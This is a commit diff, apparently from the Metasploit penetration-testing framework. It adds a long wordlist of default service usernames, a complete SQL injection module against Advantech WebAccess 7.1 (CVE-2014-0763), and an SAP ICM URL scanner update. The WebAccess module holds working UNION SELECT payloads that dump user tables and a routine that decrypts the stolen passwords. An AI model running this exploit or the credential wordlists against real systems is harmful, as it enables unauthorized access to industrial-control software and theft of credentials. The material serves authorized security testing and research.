Browse Source

Merge branch 'upstream-master' into staging/electro-release

Samuel Huckins 5 years ago
parent
commit
9e53b795c3

+ 1214
- 0
data/wordlists/default_pass_for_services_unhash.txt
File diff suppressed because it is too large
View File


+ 1787
- 0
data/wordlists/default_userpass_for_services_unhash.txt
File diff suppressed because it is too large
View File


+ 915
- 0
data/wordlists/default_users_for_services_unhash.txt View File

@@ -0,0 +1,915 @@
1
+admin
2
+
3
+root
4
+Administrator
5
+sysadm
6
+tech
7
+operator
8
+guest
9
+security
10
+debug
11
+manager
12
+service
13
+!root
14
+user
15
+netman
16
+super
17
+diag
18
+Cisco
19
+Manager
20
+DTA
21
+apc
22
+User
23
+Admin
24
+cablecom
25
+adm
26
+wradmin
27
+netscreen
28
+sa
29
+setup
30
+cmaker
31
+enable
32
+MICRO
33
+login
34
+write
35
+monitor
36
+netopia
37
+op
38
+adminview
39
+sysadmin
40
+echo
41
+craft
42
+maint
43
+comcast
44
+CSG
45
+readonly
46
+manuf
47
+cusadmin
48
+smc
49
+sweex
50
+disttech
51
+su
52
+poll
53
+SYSDBA
54
+anonymous
55
+support
56
+recovery
57
+USERID
58
+eng
59
+administrator
60
+NETWORK
61
+JDE
62
+Guest
63
+rwa
64
+USER
65
+test
66
+lp
67
+ro
68
+MAIL
69
+ami
70
+hsa
71
+system
72
+MGR
73
+ADMINISTRATOR
74
+FIELD
75
+PBX
76
+HELLO
77
+hscroot
78
+1502
79
+superuser
80
+netrangr
81
+readwrite
82
+piranha
83
+wlse
84
+l3
85
+none
86
+naadmin
87
+public
88
+NETOP
89
+MANAGER
90
+demo
91
+D-Link
92
+l2
93
+rw
94
+cgadmin
95
+storwatch
96
+vcr
97
+OPERATOR
98
+MDaemon
99
+jagadmin
100
+enquiry
101
+at4400
102
+davox
103
+PFCUser
104
+aaa
105
+topicalt
106
+admin2
107
+1234
108
+nms
109
+client
110
+sys
111
+field
112
+deskman
113
+SYSADM
114
+superadmin
115
+pmd
116
+GEN2
117
+ADMN
118
+Factory
119
+PRODDTA
120
+tellabs
121
+spcl
122
+dadmin
123
+helpdesk
124
+dhs3mt
125
+install
126
+adfexc
127
+IntraSwitch
128
+manage
129
+superman
130
+SPOOLMAN
131
+ADVMAIL
132
+vt100
133
+PSEAdmin
134
+patrol
135
+teacher
136
+PCUSER
137
+Any
138
+RSBCMON
139
+cellit
140
+inads
141
+halt
142
+locate
143
+TMAR#HWMT8007079
144
+rapport
145
+xbox
146
+device
147
+NICONEX
148
+acc
149
+31994
150
+bcim
151
+websecadm
152
+blue
153
+topicnorm
154
+supervisor
155
+ccrusr
156
+266344
157
+telecom
158
+GEN1
159
+SSA
160
+HTTP
161
+mtch
162
+bciim
163
+browse
164
+hydrasna
165
+deskres
166
+bbsd-client
167
+replicator
168
+intel
169
+radware
170
+intermec
171
+mlusr
172
+init
173
+e250
174
+Polycom
175
+temp1
176
+mac
177
+3comcso
178
+RMUser1
179
+WP
180
+NAU
181
+rcust
182
+mtcl
183
+topicres
184
+bcnas
185
+adminuser
186
+Root
187
+cac_admin
188
+mediator
189
+Anonymous
190
+kermit
191
+volition
192
+GlobalAdmin
193
+LUCENT01
194
+LUCENT02
195
+adminstat
196
+desknorm
197
+IntraStack
198
+e500
199
+deskalt
200
+cust
201
+tiara
202
+bcms
203
+m1122
204
+telco
205
+xd
206
+dhs3pms
207
+VNC
208
+customer
209
+cisco
210
+adminstrator
211
+ftp_nmc
212
+me
213
+iclock
214
+scmadmin
215
+installer
216
+webadmin
217
+ftp_inst
218
+DDIC
219
+SYSTEM
220
+draytek
221
+EARLYWATCH
222
+super.super
223
+ftp_oper
224
+corecess
225
+weblogic
226
+system/manager
227
+End
228
+d.e.b.u.g
229
+target
230
+MD110
231
+tiger
232
+adminttd
233
+wlseuser
234
+SAPCPIC
235
+ftp_admi
236
+default.password
237
+7
238
+2
239
+ADMIN
240
+itsadmin
241
+PUBSUB
242
+CTXSYS
243
+ftp
244
+bill
245
+192.168.1.1
246
+setpriv
247
+GUEST
248
+SAP*
249
+t3admin
250
+hello
251
+CISCO15
252
+1.79
253
+mso
254
+Telecom
255
+qsysopr
256
+APPS
257
+Developer
258
+mail
259
+qsecofr
260
+11111
261
+Service
262
+netadmin
263
+any
264
+db2fenc1
265
+johnson
266
+isp
267
+demos
268
+QSRV
269
+MDSYS
270
+vpasp
271
+TEST
272
+QSECOFR
273
+1
274
+informix
275
+5
276
+engmode
277
+scout
278
+qpgmr
279
+ADSL
280
+images
281
+Gearguy
282
+Demo
283
+serial#
284
+BACKUP
285
+stratacom
286
+6.x
287
+mary
288
+COMPANY
289
+SYS
290
+DSL
291
+Jetform
292
+eagle
293
+ROUTER
294
+ods
295
+siteadmin
296
+Alphanetworks
297
+Admin1
298
+janta
299
+servlet
300
+username
301
+citel
302
+Replicator
303
+SYSMAN
304
+master
305
+SUPERUSER
306
+cn=orcladmin
307
+30
308
+maintainer
309
+BRIO_ADMIN
310
+internal
311
+CQSCHEMAUSER
312
+DEV2000_DEMOS
313
+FSFTASK1
314
+checkfs
315
+USER1
316
+SQLDBA
317
+HELP
318
+toor
319
+qsrvbas
320
+SYSADMIN
321
+EZsetup
322
+BATCH
323
+STRAT_USER
324
+primenet
325
+OEMREP
326
+USER6
327
+lynx
328
+powerdown
329
+$ALOC$
330
+password
331
+VOL-0215
332
+tomcat
333
+REP_MANAGER
334
+WinCCConnect
335
+ALLIN1
336
+DIRMAINT
337
+eqadmin
338
+QSRVBAS
339
+AQJAVA
340
+LASERWRITER
341
+PERFSTAT
342
+apcuser
343
+MBWATCH
344
+system_admin
345
+unix
346
+OWNER
347
+NETPRIV
348
+VSEMAINT
349
+DEMO
350
+SYMPA
351
+REP_OWNER
352
+DCL
353
+FAX
354
+ARCHIVIST
355
+VTAMUSER
356
+VMTAPE
357
+basisk
358
+NetLinx
359
+OutOfBox
360
+NETMGR
361
+DEFAULT
362
+OAS_PUBLIC
363
+read
364
+AP
365
+MTSSYS
366
+SYSMAINT
367
+AUDIOUSER
368
+Joe
369
+IDMS
370
+$SRV
371
+snake
372
+ROOT
373
+PRINTER
374
+shutdown
375
+satan
376
+RDM470
377
+trouble
378
+fax
379
+OP1
380
+admin@example.com
381
+HOST
382
+ADLDEMO
383
+QS_ADM
384
+bin
385
+OPER
386
+oracle
387
+jj
388
+PO7
389
+www
390
+joe
391
+MAINT
392
+CMSBATCH
393
+CCC
394
+role1
395
+DATAMOVE
396
+MSHOME
397
+ISPVM
398
+crowd­-openid-­server
399
+user_editor
400
+sedacm
401
+db2admin
402
+Airaya
403
+SYSDUMP1
404
+IMEDIA
405
+primos_cs
406
+USER_TEMPLATE
407
+pnadmin
408
+lpadmin
409
+VTAM
410
+TRACESVR
411
+POSTMASTER
412
+MAILER
413
+RSCSV2
414
+QS_WS
415
+circ
416
+nobody
417
+Tasman
418
+DISCOVERER_ADMIN
419
+VMASMON
420
+LR-ISDN
421
+TURBINE
422
+GL
423
+PO
424
+PRINT
425
+MODTEST
426
+GATEWAY
427
+PRIMARY
428
+both
429
+haasadm
430
+pw
431
+games
432
+DOCSIS_APP
433
+bbs
434
+EMP
435
+postmaster
436
+SITEMINDER
437
+vgnadmin
438
+RJE
439
+gonzo
440
+NEWS
441
+AQUSER
442
+UTLBSTATU
443
+netbotz
444
+xmi_demo
445
+ORACACHE
446
+MCUser
447
+prash
448
+sync
449
+PM
450
+AP2SVP
451
+ibm
452
+ULTIMATE
453
+SABRE
454
+user_pricer
455
+SUPERVISOR
456
+EVENT
457
+PORTAL30_SSO_PS
458
+FSFADMIN
459
+OO
460
+WKSYS
461
+OPERATNS
462
+UVPIM_
463
+OE
464
+OCITEST
465
+web
466
+ESSEX
467
+None
468
+CTXDEMO
469
+user_designer
470
+QDBA
471
+role
472
+LRISDN
473
+tele
474
+WEBCAL01
475
+rsadmin
476
+OMWB_EMULATION
477
+WINDOWS_PASSTHRU
478
+MOREAU
479
+fast
480
+host
481
+ORDPLUGINS
482
+SYSWRM
483
+savelogs
484
+SDOS_ICSAP
485
+DSSYS
486
+MGWUSER
487
+TDOS_ICSAP
488
+ssp
489
+EJSADMIN
490
+INGRES
491
+DS
492
+estheralastruey
493
+VCSRV
494
+ssladmin
495
+CLARK
496
+OEMADM
497
+restoreonly
498
+quser
499
+MILLER
500
+trmcnfg
501
+REPORT
502
+user_author
503
+dpn
504
+tour
505
+mountfsys
506
+http
507
+PROG
508
+openfiler
509
+RAID
510
+STARTER
511
+FAXUSER
512
+DSA
513
+daemon
514
+mountsys
515
+backuponly
516
+IVPM1
517
+USER3
518
+OPENSPIRIT
519
+prime
520
+HPLASER
521
+CSPUSER
522
+qsvr
523
+SYSCKP
524
+Sysop
525
+user_marketer
526
+IMAGEUSER
527
+bsxuser
528
+MASTER
529
+USER9
530
+OLAPSYS
531
+rje
532
+ODM_MTR
533
+QS_ES
534
+lansweeperuser
535
+DEMO3
536
+Username
537
+GPLD
538
+uucp
539
+DBSNMP
540
+VMARCH
541
+SWUSER
542
+Operator
543
+CHEY_ARCHSVR
544
+roo
545
+n.a
546
+accounting
547
+backuprestore
548
+dni
549
+WEBADM
550
+iceman
551
+guru
552
+anon
553
+USER8
554
+PORTAL30_SSO_PUBLIC
555
+postgres
556
+WINSABRE
557
+USERP
558
+IVPM2
559
+PORTAL30_SSO
560
+ALLIN1MAIL
561
+POST
562
+TEMP
563
+BATCH1
564
+PROMAIL
565
+SECDEMO
566
+ARAdmin
567
+sadmin
568
+ORAREGSYS
569
+VMASSYS
570
+man
571
+FROSTY
572
+LASER
573
+tutor
574
+DISKCNT
575
+default
576
+SYSERR
577
+WWW
578
+VAX
579
+PROCAL
580
+FAXWORKS
581
+LDAP_Anonymous
582
+(any
583
+setup/snmp
584
+DSGATEWAY
585
+AWARD_SW
586
+CSMIG
587
+umountfsys
588
+VMS
589
+bpel
590
+viewuser
591
+TDISK
592
+politically
593
+user_analyst
594
+RSCS
595
+COMPIERE
596
+OSP22
597
+guest1
598
+FORSE
599
+factory
600
+bubba
601
+QUSER
602
+primeos
603
+glftpd
604
+RMAN
605
+mountfs
606
+DIRECT
607
+firstsite
608
+IPFSERV
609
+TSUSER
610
+BATCH2
611
+snmp
612
+WebAdmin
613
+IBMUSER
614
+SMART
615
+voadmin
616
+BC4J
617
+core
618
+OPERVAX
619
+Bobo
620
+WANGTEK
621
+OWA
622
+USER2
623
+jasperadmin
624
+VMBSYSAD
625
+PVM
626
+ctb_admin
627
+ 
628
+DEMO4
629
+qsrv
630
+superdba
631
+PORTAL30
632
+XPRT
633
+Crowd
634
+18364
635
+ilom-admin
636
+rdc123
637
+sysopr
638
+tasman
639
+blank
640
+WEBREAD
641
+ODM
642
+11111111
643
+AURORA$ORB$UNAUTHENTICATED
644
+ADAMS
645
+Craft
646
+rfmngr
647
+SYSTEST_CLIG
648
+user_approver
649
+ilom-operator
650
+Nice-admin
651
+answer
652
+NETNONPRIV
653
+nuucp
654
+CIDS
655
+VASTEST
656
+redline
657
+MBMANAGER
658
+webmaster
659
+APPLSYS
660
+USER4
661
+hqadmin
662
+UOMNI_
663
+VMUTIL
664
+uucpadm
665
+EXFSYS
666
+4Dgifts
667
+JMUSER
668
+CIS
669
+UNITY_
670
+HLW
671
+pwrchute
672
+IDMSSE
673
+NSA
674
+TELEDEMO
675
+recover
676
+TRAVEL
677
+lexar
678
+viewer
679
+LIBRARY
680
+PO8
681
+root@localhost
682
+NAMES
683
+secofr
684
+PDMREMI
685
+MGE
686
+USER7
687
+OWA_PUBLIC
688
+questra
689
+builtin
690
+SFCNTRL
691
+boss
692
+PLEX
693
+OLAPDBA
694
+OLAPSVR
695
+user_expert
696
+Bhosda
697
+gropher
698
+TAHITI
699
+NEWINGRES
700
+VM3812
701
+VIF_DEVELOPER
702
+joeuser
703
+IPC
704
+HELPDESK
705
+wlpisystem
706
+TSAFVM
707
+prtgadmin
708
+UAMIS_
709
+theman
710
+CISINFO
711
+mobile
712
+QS_CB
713
+CDEMORID
714
+DEMO2
715
+PORTAL30_PUBLIC
716
+MDDEMO_CLERK
717
+PHANTOM
718
+ODS
719
+BLAKE
720
+TSDEV
721
+PRODBM
722
+dos
723
+APL2PP
724
+god1
725
+CICSUSER
726
+22222222
727
+user_publisher
728
+OSE$HTTP$ADMIN
729
+def
730
+SuperUser
731
+QS_CBADM
732
+SYSA
733
+STUDENT
734
+Draytek
735
+SMDR
736
+EREP
737
+VSEMAN
738
+fwadmin
739
+MTS_USER
740
+AQDEMO
741
+private
742
+IS_$hostname
743
+HPSupport
744
+ORASSO
745
+CVIEW
746
+SH
747
+XXSESS_MGRYY
748
+VMMAP
749
+PORTAL30_DEMO
750
+Ezsetup
751
+QS_CS
752
+CMSUSER
753
+DEMO1
754
+userNotUsed
755
+ncadmin
756
+TESTPILOT
757
+fg_sysadmin
758
+UETP
759
+QS
760
+DBI
761
+JWARD
762
+APPS_MRC
763
+Moe
764
+SENTINEL
765
+Yak
766
+PDP11
767
+Flo
768
+SLIDE
769
+INFO
770
+checkfsys
771
+PRODCICS
772
+MXAGENT
773
+VMTLIBR
774
+POWERCARTUSER
775
+VMBACKUP
776
+CPNUC
777
+distrib
778
+MIGRATE
779
+CDEMOUCB
780
+OLTSEP
781
+sysbin
782
+signa
783
+autocad
784
+WEBDB
785
+ncrm
786
+SAMPLE
787
+HCPARK
788
+ALLINONE
789
+nm2user
790
+SAVSYS
791
+IIPS
792
+PATROL
793
+mailadmin
794
+TMSADM
795
+ESubscriber
796
+software
797
+god2
798
+FSFTASK2
799
+ORDSYS
800
+gopher
801
+PSFMAINT
802
+EAdmin
803
+12345
804
+DECNET
805
+OPERATIONS
806
+$system
807
+PANAMA
808
+LIBRARIAN
809
+fal
810
+NETSERVER
811
+POWERCHUTE
812
+USER5
813
+GPFD
814
+QS_OS
815
+REPADMIN
816
+0
817
+DEMO8
818
+DEMO9
819
+CDEMO82
820
+umountsys
821
+USER0
822
+CDEMOCOR
823
+SYSTEST
824
+Rodopi
825
+user_checker
826
+qserv
827
+AQ
828
+SAPR3
829
+VRR1
830
+fastwire
831
+admi
832
+FINANCE
833
+WinCCAdmin
834
+ESTOREUSER
835
+VIRUSER
836
+LINK
837
+APPLSYSPUB
838
+overseer
839
+checksys
840
+umountfs
841
+DBDCCICS
842
+TOAD
843
+ntpupdate
844
+MDDEMO_MGR
845
+billy-bob
846
+DECMAIL
847
+alien
848
+nsroot
849
+AdvWebadmin
850
+dvstation
851
+SERVICECONSUMER1
852
+MMO2
853
+NOC
854
+WWWUSER
855
+SAP
856
+NEVIEW
857
+ODSCOMMON
858
+pixadmin
859
+ripeop
860
+PENG
861
+netlink
862
+L2LDEMO
863
+OUTLN
864
+12.x
865
+scott
866
+dbase
867
+fam
868
+Oper
869
+RMAIL
870
+FND
871
+PRIV
872
+SETUP
873
+news
874
+VSEIPO
875
+ilon
876
+PLSQL
877
+politcally
878
+18140815
879
+APPUSER
880
+CENTRA
881
+LBACSYS
882
+PDP8
883
+SFCMI
884
+lpadm
885
+Test
886
+bewan
887
+DIP
888
+mfd
889
+MDDEMO
890
+SWPRO
891
+DES
892
+Coco
893
+GCS
894
+rodopi
895
+Scott
896
+Admin5
897
+ANDY
898
+DESQUETOP
899
+NETCON
900
+JONES
901
+author
902
+MOESERV
903
+PUBSUB1
904
+CATALOG
905
+SQLUSER
906
+RE
907
+REPORTS_USER
908
+MFG
909
+HR
910
+VIDEOUSER
911
+DBA
912
+AUTOLOG1
913
+AURORA$JIS$UTILITY$
914
+wlcsystem
915
+CPRM

+ 1
- 1
lib/rex/proto/http/client.rb View File

@@ -480,7 +480,7 @@ class Client
480 480
     opts['headers']||= {}
481 481
 
482 482
     ntlmssp_flags = ::Rex::Proto::NTLM::Utils.make_ntlm_flags(ntlm_options)
483
-    workstation_name = Rex::Text.rand_text_alpha(rand(8)+1)
483
+    workstation_name = Rex::Text.rand_text_alpha(rand(8)+6)
484 484
     domain_name = self.config['domain']
485 485
 
486 486
     b64_blob = Rex::Text::encode_base64(

+ 299
- 0
modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb View File

@@ -0,0 +1,299 @@
1
+##
2
+# This module requires Metasploit: http//metasploit.com/download
3
+# Current source: https://github.com/rapid7/metasploit-framework
4
+##
5
+
6
+require 'msf/core'
7
+require 'rexml/document'
8
+
9
+class Metasploit3 < Msf::Auxiliary
10
+
11
+  include Msf::Exploit::Remote::HttpClient
12
+  include Msf::Auxiliary::Report
13
+  include REXML
14
+
15
+  def initialize(info = {})
16
+    super(update_info(info,
17
+      'Name'           => 'Advantech WebAccess SQL Injection',
18
+      'Description'    => %q{
19
+        This module exploits a SQL injection vulnerability found in Advantech WebAccess 7.1. The
20
+        vulnerability exists in the DBVisitor.dll component, and can be abused through malicious
21
+        requests to the ChartThemeConfig web service. This module can be used to extract the site
22
+        and project usernames and hashes.
23
+      },
24
+      'References'     =>
25
+        [
26
+          [ 'CVE', '2014-0763' ],
27
+          [ 'ZDI', '14-077' ],
28
+          [ 'OSVDB', '105572' ],
29
+          [ 'BID', '66740' ],
30
+          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-14-079-03' ]
31
+        ],
32
+      'Author'         =>
33
+        [
34
+          'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
35
+          'juan vazquez' # Metasploit module
36
+        ],
37
+      'License'        => MSF_LICENSE,
38
+      'DisclosureDate' => "Apr 08 2014"
39
+    ))
40
+
41
+    register_options(
42
+      [
43
+        OptString.new("TARGETURI", [true, 'The path to the BEMS Web Site', '/BEMS']),
44
+        OptString.new("WEB_DATABASE", [true, 'The path to the bwCfg.mdb database in the target', "C:\\WebAccess\\Node\\config\\bwCfg.mdb"])
45
+      ], self.class)
46
+  end
47
+
48
+  def build_soap(injection)
49
+    xml = Document.new
50
+    xml.add_element(
51
+        "s:Envelope",
52
+        {
53
+            'xmlns:s' => "http://schemas.xmlsoap.org/soap/envelope/"
54
+        })
55
+    xml.root.add_element("s:Body")
56
+    body = xml.root.elements[1]
57
+    body.add_element(
58
+        "GetThemeNameList",
59
+        {
60
+            'xmlns' => "http://tempuri.org/"
61
+        })
62
+    name_list = body.elements[1]
63
+    name_list.add_element("userName")
64
+    name_list.elements['userName'].text = injection
65
+
66
+    xml.to_s
67
+  end
68
+
69
+  def do_sqli(injection, mark)
70
+    xml = build_soap(injection)
71
+
72
+    res = send_request_cgi({
73
+      'method'    => 'POST',
74
+      'uri'       => normalize_uri(target_uri.path.to_s, "Services", "ChartThemeConfig.svc"),
75
+      'ctype'    => 'text/xml; charset=UTF-8',
76
+      'headers'  => {
77
+          'SOAPAction' => '"http://tempuri.org/IChartThemeConfig/GetThemeNameList"'
78
+      },
79
+      'data'      => xml
80
+    })
81
+
82
+    unless res && res.code == 200 && res.body && res.body.include?(mark)
83
+      return nil
84
+    end
85
+
86
+    res.body.to_s
87
+  end
88
+
89
+  def check
90
+    mark = Rex::Text.rand_text_alpha(8 + rand(5))
91
+    injection =  "#{Rex::Text.rand_text_alpha(8 + rand(5))}' "
92
+    injection << "union all select '#{mark}' from BAThemeSetting where '#{Rex::Text.rand_text_alpha(2)}'='#{Rex::Text.rand_text_alpha(3)}"
93
+    data = do_sqli(injection, mark)
94
+
95
+    if data.nil?
96
+      return Msf::Exploit::CheckCode::Safe
97
+    end
98
+
99
+    Msf::Exploit::CheckCode::Vulnerable
100
+  end
101
+
102
+  def parse_users(xml, mark, separator)
103
+    doc = Document.new(xml)
104
+
105
+    strings = XPath.match(doc, "s:Envelope/s:Body/GetThemeNameListResponse/GetThemeNameListResult/a:string").map(&:text)
106
+    strings_length = strings.length
107
+
108
+    unless strings_length > 1
109
+      return
110
+    end
111
+
112
+    i = 0
113
+    strings.each do |result|
114
+      next if result == mark
115
+      @users << result.split(separator)
116
+      i = i + 1
117
+    end
118
+
119
+  end
120
+
121
+  def run
122
+    print_status("#{peer} - Exploiting sqli to extract users information...")
123
+    mark = Rex::Text.rand_text_alpha(8 + rand(5))
124
+    rand = Rex::Text.rand_text_numeric(2)
125
+    separator = Rex::Text.rand_text_alpha(5 + rand(5))
126
+    # While installing I can only configure an Access backend, but
127
+    # according to documentation other backends are supported. This
128
+    # injection should be compatible, hopefully, with most backends.
129
+    injection =  "#{Rex::Text.rand_text_alpha(8 + rand(5))}' "
130
+    injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 + '#{separator}BAUser' from BAUser where #{rand}=#{rand} "
131
+    injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 + '#{separator}pUserPassword' from pUserPassword IN '#{datastore['WEB_DATABASE']}' where #{rand}=#{rand} "
132
+    injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 + '#{separator}pAdmin' from pAdmin IN '#{datastore['WEB_DATABASE']}' where #{rand}=#{rand} "
133
+    injection << "union all select '#{mark}' from BAThemeSetting where '#{Rex::Text.rand_text_alpha(2)}'='#{Rex::Text.rand_text_alpha(3)}"
134
+    data = do_sqli(injection, mark)
135
+
136
+    if data.blank?
137
+      print_error("#{peer} - Error exploiting sqli")
138
+      return
139
+    end
140
+
141
+    @users = []
142
+    @plain_passwords = []
143
+
144
+    print_status("#{peer} - Parsing extracted data...")
145
+    parse_users(data, mark, separator)
146
+
147
+    if @users.empty?
148
+      print_error("#{peer} - Users not found")
149
+      return
150
+    else
151
+      print_good("#{peer} - #{@users.length} users found!")
152
+    end
153
+
154
+    users_table = Rex::Ui::Text::Table.new(
155
+      'Header'  => 'Advantech WebAccess Users',
156
+      'Ident'   => 1,
157
+      'Columns' => ['Username', 'Encrypted Password', 'Key', 'Recovered password', 'Origin']
158
+    )
159
+
160
+    for i in 0..@users.length - 1
161
+      @plain_passwords[i] =
162
+          begin
163
+            decrypt_password(@users[i][1], @users[i][2])
164
+          rescue
165
+            "(format not recognized)"
166
+          end
167
+
168
+      @plain_passwords[i] = "(blank password)" if @plain_passwords[i].empty?
169
+
170
+      begin
171
+        @plain_passwords[i].encode("ISO-8859-1").to_s
172
+      rescue Encoding::UndefinedConversionError
173
+        chars = @plain_passwords[i].unpack("C*")
174
+        @plain_passwords[i] = "0x#{chars.collect {|c| c.to_s(16)}.join(", 0x")}"
175
+        @plain_passwords[i] << " (ISO-8859-1 hex chars)"
176
+      end
177
+
178
+      report_auth_info({
179
+       :host => rhost,
180
+       :port => rport,
181
+       :user => @users[i][0],
182
+       :pass => @plain_passwords[i],
183
+       :type => "password",
184
+       :sname => (ssl ? "https" : "http"),
185
+       :proof => "Leaked encrypted password from #{@users[i][3]}: #{@users[i][1]}:#{@users[i][2]}"
186
+      })
187
+
188
+      users_table << [@users[i][0], @users[i][1], @users[i][2], @plain_passwords[i], user_type(@users[i][3])]
189
+    end
190
+
191
+    print_line(users_table.to_s)
192
+  end
193
+
194
+  def user_type(database)
195
+    user_type = database
196
+
197
+    unless database == "BAUser"
198
+      user_type << " (Web Access)"
199
+    end
200
+
201
+    user_type
202
+  end
203
+
204
+  def decrypt_password(password, key)
205
+    recovered_password = recover_password(password)
206
+    recovered_key = recover_key(key)
207
+
208
+    recovered_bytes = decrypt_bytes(recovered_password, recovered_key)
209
+    password = []
210
+
211
+    recovered_bytes.each { |b|
212
+      if b == 0
213
+        break
214
+      else
215
+        password.push(b)
216
+      end
217
+    }
218
+
219
+    return password.pack("C*")
220
+  end
221
+
222
+  def recover_password(password)
223
+    bytes = password.unpack("C*")
224
+    recovered = []
225
+
226
+    i = 0
227
+    j = 0
228
+    while i < 16
229
+      low = bytes[i]
230
+      if low < 0x41
231
+        low = low - 0x30
232
+      else
233
+        low = low - 0x37
234
+      end
235
+      low = low * 16
236
+
237
+      high = bytes[i+1]
238
+      if high < 0x41
239
+        high = high - 0x30
240
+      else
241
+        high = high - 0x37
242
+      end
243
+
244
+      recovered_byte = low + high
245
+      recovered[j] = recovered_byte
246
+      i = i + 2
247
+      j = j + 1
248
+    end
249
+
250
+    recovered
251
+  end
252
+
253
+  def recover_key(key)
254
+    bytes = key.unpack("C*")
255
+    recovered = 0
256
+
257
+    bytes[0, 8].each { |b|
258
+      recovered = recovered * 16
259
+      if b < 0x41
260
+        byte_weight = b - 0x30
261
+      else
262
+        byte_weight = b - 0x37
263
+      end
264
+      recovered = recovered + byte_weight
265
+    }
266
+
267
+    recovered
268
+  end
269
+
270
+  def decrypt_bytes(bytes, key)
271
+    result = []
272
+    xor_table = [0xaa, 0xa5, 0x5a, 0x55]
273
+    key_copy = key
274
+    for i in 0..7
275
+      byte = (crazy(bytes[i] ,8 - (key & 7)) & 0xff)
276
+      result.push(byte ^ xor_table[key_copy & 3])
277
+      key_copy = key_copy / 4
278
+      key = key / 8
279
+    end
280
+
281
+    result
282
+  end
283
+
284
+  def crazy(byte, magic)
285
+    result = byte & 0xff
286
+
287
+    while magic > 0
288
+      result = result * 2
289
+        if result & 0x100 == 0x100
290
+          result = result + 1
291
+        end
292
+        magic = magic - 1
293
+    end
294
+
295
+    result
296
+  end
297
+
298
+end
299
+

+ 93
- 56
modules/auxiliary/scanner/sap/sap_icm_urlscan.rb View File

@@ -3,7 +3,6 @@
3 3
 # Current source: https://github.com/rapid7/metasploit-framework
4 4
 ##
5 5
 
6
-require 'rex/proto/http'
7 6
 require 'msf/core'
8 7
 
9 8
 class Metasploit3 < Msf::Auxiliary
@@ -30,62 +29,43 @@ class Metasploit3 < Msf::Auxiliary
30 29
     register_options(
31 30
       [
32 31
         OptString.new('VERB',    [true, "Verb for auth bypass testing", "HEAD"]),
33
-        OptString.new('URLFILE', [true, "SAP ICM Paths File", "sap_icm_paths.txt"])
32
+        OptPath.new('URLFILE', [true, "SAP ICM Paths File",
33
+          File.join(Msf::Config.data_directory, 'wordlists', 'sap_icm_paths.txt')])
34 34
       ], self.class)
35 35
   end
36 36
 
37 37
   # Base Structure of module borrowed from jboss_vulnscan
38 38
   def run_host(ip)
39
-    # If URLFILE is set empty, obviously the user made a silly mistake
40
-    if datastore['URLFILE'].empty?
41
-      print_error("Please specify a URLFILE")
42
-      return
43
-    end
44
-
45
-    # Initialize the actual URLFILE path
46
-    if datastore['URLFILE'] == "sap_icm_paths.txt"
47
-      url_file = "#{Msf::Config.data_directory}/wordlists/#{datastore['URLFILE']}"
48
-    else
49
-      # Not the default sap_icm_paths file
50
-      url_file = datastore['URLFILE']
51
-    end
52
-
53
-    # If URLFILE path doesn't exist, no point to continue the rest of the script
54
-    if not File.exists?(url_file)
55
-      print_error("Required URL list #{url_file} was not found")
56
-      return
57
-    end
58
-
59
-    res = send_request_cgi(
39
+     res = send_request_cgi(
60 40
       {
61 41
         'uri'       => "/" + Rex::Text.rand_text_alpha(12),
62 42
         'method'    => 'GET',
63
-        'ctype'     => 'text/plain',
64
-      }, 20)
43
+      })
65 44
 
66 45
     if res
67 46
       print_status("Note: Please note these URLs may or may not be of interest based on server configuration")
68 47
       @info = []
69
-      if not res.headers['Server'].nil?
48
+      if res.headers['Server']
70 49
         @info << res.headers['Server']
71 50
         print_status("#{rhost}:#{rport} Server responded with the following Server Header: #{@info[0]}")
72 51
       else
73 52
         print_status("#{rhost}:#{rport} Server responded with a blank or missing Server Header")
74 53
       end
75 54
 
76
-      if (res.body and /class="note">(.*)code:(.*)</i.match(res.body) )
55
+      if (res.body && /class="note">(.*)code:(.*)</i.match(res.body) )
77 56
         print_error("#{rhost}:#{rport} SAP ICM error message: #{$2}")
78 57
       end
79 58
 
80 59
       # Load URLs
81
-      urls_to_check = []
82
-      File.open(url_file) do |f|
60
+      urls_to_check = check_urlprefixes
61
+      File.open(datastore['URLFILE']) do |f|
83 62
         f.each_line do |line|
84 63
           urls_to_check.push line
85 64
         end
86 65
       end
87 66
 
88 67
       print_status("#{rhost}:#{rport} Beginning URL check")
68
+      @valid_urls = ''
89 69
       urls_to_check.each do |url|
90 70
         check_url(url.strip)
91 71
       end
@@ -93,59 +73,116 @@ class Metasploit3 < Msf::Auxiliary
93 73
       print_error("#{rhost}:#{rport} No response received")
94 74
     end
95 75
 
76
+    if @valid_urls.length > 0
77
+      l = store_loot(
78
+        'sap.icm.urls',
79
+        "text/plain",
80
+        datastore['RHOST'],
81
+        @valid_urls,
82
+        "icm_urls.txt", "SAP ICM Urls"
83
+      )
84
+      print_line
85
+      print_good("Stored urls as loot: #{l}") if l
86
+    end
96 87
   end
97 88
 
98 89
   def check_url(url)
90
+    full_url = write_url(url)
99 91
     res = send_request_cgi({
100
-      'uri'       => url,
92
+      'uri'       => normalize_uri(url),
101 93
       'method'    => 'GET',
102
-      'ctype'     => 'text/plain',
103
-    }, 20)
94
+    })
104 95
 
105 96
     if (res)
106
-      if not @info.include?(res.headers['Server']) and not res.headers['Server'].nil?
107
-        print_good("New server header seen [#{res.headers['Server']}]")
108
-        @info << res.headers['Server'] #Add To seen server headers
97
+      if res.headers['Server']
98
+        unless @info.include?(res.headers['Server'])
99
+          print_good("New server header seen [#{res.headers['Server']}]")
100
+          @info << res.headers['Server'] #Add To seen server headers
101
+        end
109 102
       end
110 103
 
111
-      case
112
-      when res.code == 200
113
-        print_good("#{rhost}:#{rport} #{url} - does not require authentication (200)")
114
-      when res.code == 403
115
-        print_good("#{rhost}:#{rport} #{url} - restricted (403)")
116
-      when res.code == 401
117
-        print_good("#{rhost}:#{rport} #{url} - requires authentication (401): #{res.headers['WWW-Authenticate']}")
104
+      case res.code
105
+      when 200
106
+        print_good("#{full_url} - does not require authentication (#{res.code}) (length: #{res.headers['Content-Length']})")
107
+        @valid_urls << full_url << "\n"
108
+      when 403
109
+        print_status("#{full_url} - restricted (#{res.code})")
110
+      when 401
111
+        print_status("#{full_url} - requires authentication (#{res.code}): #{res.headers['WWW-Authenticate']}")
112
+        @valid_urls << full_url << "\n"
118 113
